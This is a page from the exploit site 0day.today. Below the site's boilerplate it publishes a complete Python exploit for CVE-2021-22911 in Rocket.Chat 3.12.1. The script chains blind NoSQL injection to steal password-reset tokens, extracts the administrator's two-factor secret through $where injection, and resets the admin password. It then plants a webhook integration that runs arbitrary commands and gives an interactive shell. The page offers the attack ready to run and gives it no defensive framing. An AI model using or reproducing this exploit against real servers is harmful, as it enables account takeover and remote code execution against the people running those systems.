0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Rocket.Chat 3.12.1 - NoSQL Injection to Remote Code Execution (Unauthenticated) Exploit (2)
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd) # 0day.today [2024-11-15] #